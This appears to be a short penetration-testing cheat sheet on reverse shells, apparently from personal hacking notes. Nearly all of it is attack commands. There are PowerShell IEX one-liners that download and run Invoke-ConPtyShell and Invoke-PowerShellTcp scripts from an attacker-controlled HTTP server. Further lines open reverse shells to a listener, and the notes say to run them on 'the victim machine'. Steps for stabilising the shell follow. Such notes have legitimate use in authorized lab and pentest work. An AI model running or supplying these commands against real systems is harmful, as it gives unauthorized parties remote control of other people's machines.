Normal Reverse Shell Tools
Last updated
Last updated
! don't use rlwrap and start listener just with nc and a python http server:
IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2/Invoke-ConPtyShell.ps1')
Invoke-ConPtyShell -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 24 -Cols 80
Once you have the shell type ENTER
, then ^Z,
then stty raw -echo; fg
, then ENTER
To download and run the reverse shell in one step, we add the following line at the end of the script:
Invoke-PowerShellTcp -Reverse -IPAddress {My IP} -Port {Port}
Then we start a python server and run the following command on the victim machine:
powershell IEX(New-Object Net.WebClient).downloadString('http://{My_IP}:{PORT}/Invoke-PowerShellTcp.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress listen_ip -Port listener_port